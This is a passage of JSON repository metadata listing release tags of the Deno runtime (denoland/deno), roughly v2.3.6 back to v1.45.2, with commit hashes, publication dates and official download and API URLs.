.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"